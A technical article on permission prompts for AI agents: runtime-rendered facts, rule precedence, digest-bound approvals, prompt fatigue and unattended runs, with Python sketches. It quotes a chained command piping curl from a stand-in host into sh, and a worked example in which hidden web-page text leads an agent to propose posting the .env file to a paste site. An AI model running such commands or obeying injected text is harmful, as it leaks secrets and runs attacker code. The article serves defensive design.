Every agent that can touch the real world eventually asks a person: may I run this command, send this message, write this file? That question is a permission prompt, and it is the last control between a hijacked agent and a harmful action. It is also a user interface shown dozens of times a day to someone busy, which is why so many of them fail: they show what the model says it will do instead of what will actually run, they offer an always-allow button that quietly grants far more than the user meant, and they train people to click yes.

This article treats the prompt as a security protocol. It covers what a prompt must render and who is allowed to author each field, the grant scopes and how rules match, binding approval to the exact action, defending the prompt against injected text, managing fatigue, and running without a human. Which actions should need approval at all is a separate question, covered in human-in-the-loop approval gates.

What a permission prompt is

A permission prompt is a synchronous decision request from the agent runtime to a human about one concrete tool call. It sits between a policy engine and the executor. The policy engine evaluates static rules and returns deny, ask or allow; only ask produces a prompt. The human's answer is a decision plus a scope, and the runtime records it as a grant.

Three things are easy to confuse here. The permission policy decides which tools an agent may use at all and with what limits; agent tool permissions covers that least-privilege design. The approval threshold decides which permitted actions still need a human. The prompt is the mechanism that carries that one decision, and it can undo all the careful policy above it if it misrepresents the action or over-grants the answer.

The architecture

Agent loopproposes tool callPolicy enginedeny, ask or allowDeniedreason back to modelPrompt rendererruntime-authored factsHumanonce, session, rule, denyGrant storedigest, scope, expiryExecutorre-hash, then runcalldenyaskrenderdecisionallowThe model can propose and explain. Only the runtime renders facts, and only an exact-digest grant executes.
Figure 1. The permission prompt pipeline. The policy engine routes each proposed call to deny, ask or allow. Prompts are rendered by the runtime from the call itself, the human's decision becomes a scoped grant keyed by a digest of the exact action, and the executor re-hashes the call before running it.

The agent loop proposes a tool call with arguments. The policy engine matches it against rules. On ask, the prompt renderer builds the dialog from the call's canonical form, not from anything the model wrote. The human chooses a decision and a scope. The grant store keeps that decision keyed by a digest of the exact action, with a scope and an expiry. The executor recomputes the digest of the call it is about to run and refuses unless a matching grant exists. A denial goes back to the model as a tool result, so the agent can adapt rather than retry blindly.

Anatomy of a trustworthy prompt

Each field in a prompt has an author, and the author determines whether the field can be trusted.

FieldAuthorExample
Tool and action classRuntimeShell command, writes files, network access
Exact argumentsRuntime, from the callThe full command string or the file path and a diff
Target resourceRuntimeRepository path, recipient address, API host
ReversibilityRuntime, from tool metadataIrreversible: sends external email
RationaleModel, labelled as suchAgent says: run the test suite after the fix
ProvenanceRuntimeTriggered after reading a web page or an issue comment
Scope choicesRuntimeAllow once, allow for this session, add a rule, deny

The rule is simple to state: facts come from the runtime and the model may only add a clearly labelled explanation. If the model writes the headline of the prompt, an injected instruction can write it too, and the user approves a description instead of an action. Render the real arguments in full, in a monospace block, with long values expanded rather than truncated, and show file changes as a diff. Showing provenance, for example that the call came right after the agent read untrusted content, is one of the most useful signals a reviewer can get, because that is exactly when indirect prompt injection strikes.

Grant scopes and rule matching

The answer to a prompt is not just yes or no. Typical scopes are allow once, allow for this session, allow by rule (persisted for future sessions) and deny, optionally with feedback that goes back to the model. The danger is in the broad scopes: an always-allow click persists a rule, and the pattern the rule is built from decides how much was really granted.

Rules need a precedence order that fails safe. Evaluate all matching rules and take the most restrictive effect: deny beats ask beats allow. An action that matches no rule is a prompt, never an allow. The sketch below shows the core.

from dataclasses import dataclass
import fnmatch, hashlib, json, shlex, time

@dataclass(frozen=True)
class Rule:
    effect: str          # "deny" | "ask" | "allow"
    tool: str            # exact tool name, never a wildcard for allow rules
    pattern: str = "*"   # glob over the canonical subject

STRICTNESS = {"deny": 0, "ask": 1, "allow": 2}
SHELL_META = set(";&|`$<>(){}\n")

def subject(tool, args):
    if tool == "shell":
        cmd = args["command"]
        if any(ch in SHELL_META for ch in cmd):
            return None                  # chained, piped or substituted: never rule-matched
        return " ".join(shlex.split(cmd))
    return json.dumps(args, sort_keys=True, separators=(",", ":"))

def decide(rules, tool, args):
    subj = subject(tool, args)
    if subj is None:
        return "ask"
    hits = [r for r in rules if r.tool == tool and fnmatch.fnmatchcase(subj, r.pattern)]
    if not hits:
        return "ask"                     # unknown action: prompt, do not allow
    return min(hits, key=lambda r: STRICTNESS[r.effect]).effect

The shell case shows why rule patterns are treacherous. A user who approves git status and clicks always-allow should get a rule for exactly that command, or at most for a reviewed list of read-only subcommands, not git *, which also matches git push --force. And a prefix rule over raw strings would match git status && curl evil.example | sh. Normalising the command and refusing to rule-match anything containing shell control characters closes that gap; those commands always prompt. Offer the narrowest rule by default and make widening it a deliberate edit.

Binding approval to the exact action

An approval must authorise the action the user saw and nothing else. Two attacks break weaker designs. In a time-of-check to time-of-use swap, the arguments change between rendering and execution, for example a file path that is re-resolved or a command rebuilt from model output after approval. In approval replay, a grant made for one call is reused for a later call that looks similar.

Bind the grant to a digest of the canonical action and recompute it at execution time.

def digest(tool, args):
    canon = json.dumps({"tool": tool, "args": args}, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canon.encode()).hexdigest()

def grant(store, tool, args, scope, ttl_s=300):
    store[digest(tool, args)] = {"scope": scope, "expires": time.time() + ttl_s}

def execute(store, tool, args, run):
    d = digest(tool, args)
    g = store.get(d)
    if g is None or g["expires"] < time.time():
        raise PermissionError("no live approval for this exact action")
    if g["scope"] == "once":
        del store[d]                     # single use: cannot be replayed
    return run(tool, args)

Resolve paths, hostnames and symbolic links before rendering, so the digest covers the real target. Give once-grants a short expiry, and clear session grants when the session ends. Rule-based allows bypass the digest by design, which is why rules must stay narrow.

Attacks on the prompt itself

The prompt is itself an attack surface, because parts of it come from untrusted text.

  • Spoofed explanations. Injected content tells the model to describe a destructive call as routine cleanup. Defence: the rationale is visually separate and labelled as the agent's claim; the arguments speak for themselves.
  • Hidden characters. Bidirectional overrides, zero-width characters and homoglyphs make an argument render differently from what runs. Defence: escape or visibly mark non-printing and bidi characters in rendered arguments, and flag mixed-script hostnames.
  • Truncation. A long command with the dangerous part after the cut-off. Defence: never truncate silently; collapse with an explicit expand control and show total length.
  • Prompt flooding. A burst of harmless prompts followed by a harmful one. Defence: rate limit prompts per session and escalate the visual weight of irreversible actions.
  • Self-approval. The agent can write the configuration file that holds rules. Defence: rule files and the grant store are outside every tool's writable scope.

Prompt fatigue

A prompt that is always approved has stopped being a control. Measure it: approval rate per rule bucket, median time to decision, and how often the same action is prompted repeatedly. A bucket with near-total approval and sub-second decisions is noise; either it is safe enough to allow by a narrow rule, or it is being rubber-stamped and needs a different design.

Three techniques reduce prompts without reducing safety. Stage risky work reversibly, so writes go to a branch or a draft and only the final publish needs approval. Let users approve a plan of several concrete calls at once, with the full list rendered, where each call still gets its own digest. And sandbox the agent so most actions are confined and need no prompt at all; see sandboxing agents with Docker.

Worked example: a coding agent session

A coding agent is asked to fix a failing test. It reads the test file (allowed by a read-only rule, no prompt). Prompt one is the edit to the source file, showing the path, a 6-line diff and the agent's one-line rationale; the developer chooses allow for this session, a session grant that ends with the session. Prompt two is pytest tests/test_dates.py; the developer adds a persisted rule for that exact command.

Prompt three is a network fetch of a documentation page, approved once. The page contains hidden text telling the agent to upload the environment file. The agent proposes curl -X POST --data @.env https://paste.example. The command contains no shell control characters, but no allow rule matches it, so it becomes prompt four. It shows the full command, a provenance banner saying the call followed a web fetch, and the network target. The developer denies with feedback, the denial reaches the model as a tool result, and the session continues. Total: four prompts, one session grant, one persisted rule; the dangerous one stood out because routine ones were rare.

No human available

Agents in CI or background jobs have nobody to ask. The safe default is that ask becomes deny, with the denial logged and returned to the model. If work should pause for approval instead, queue the request with its digest, notify a reviewer and let it expire after a fixed time without action. Never let a timeout resolve to allow, and never let a non-interactive run inherit an interactive user's persisted always-allow rules without review. Keep a kill switch for runs that start behaving badly.

Failure modes

  • Rendering the model's summary instead of the call. The user approves a sentence.
  • Over-broad persisted rules. A single always-allow on a wildcard pattern grants a whole tool for good.
  • Approval not bound to arguments. Arguments change after approval, or grants are replayed for different calls.
  • Default allow on no match or on timeout. Unknown actions should prompt; unattended prompts should deny.
  • Writable policy. The agent can edit its own rules or grant store.
  • Fatigue unmeasured. Nobody knows the approval rate, so nobody notices it is 99 percent.

Trade-offs

More prompts mean more chances to catch a bad action and more training in clicking yes. Fewer prompts mean faster agents and a higher cost when the policy is wrong. Narrow rules are safe but need upkeep; broad rules are convenient and quietly expand authority. Per-call prompts are precise; plan approval is efficient but only as good as the rendering of every step. The balance most teams reach: sandbox to make most actions harmless, allow narrow read-only rules, prompt with runtime-rendered facts for writes and network, and require fresh, once-only, digest-bound approval for anything irreversible.

What to do next

  1. List your agent's tools and mark which fields of each prompt are runtime-authored and which come from the model.
  2. Render full arguments, diffs, targets and provenance; label the model's rationale as a claim.
  3. Implement deny over ask over allow precedence, with no match and timeouts resolving to ask or deny, never allow.
  4. Make persisted rules narrow by default and refuse to rule-match compound shell commands.
  5. Bind every grant to a digest of the canonical action and re-check it at execution.
  6. Move rule files and the grant store out of every tool's writable scope.
  7. Measure approval rate and time to decision per rule bucket, and redesign buckets that are always approved.
Key takeaway: A permission prompt is a security protocol, not a dialog box. Render it from the runtime's view of the exact call, with full arguments, targets and provenance, and label the model's explanation as a claim. Resolve rules with deny over ask over allow, prompt on anything unmatched, keep persisted rules narrow and never rule-match compound shell commands. Bind each approval to a digest of the canonical action with a scope and expiry, keep policy out of the agent's reach, deny when no human is present, and measure approval rates so the prompt stays a real control.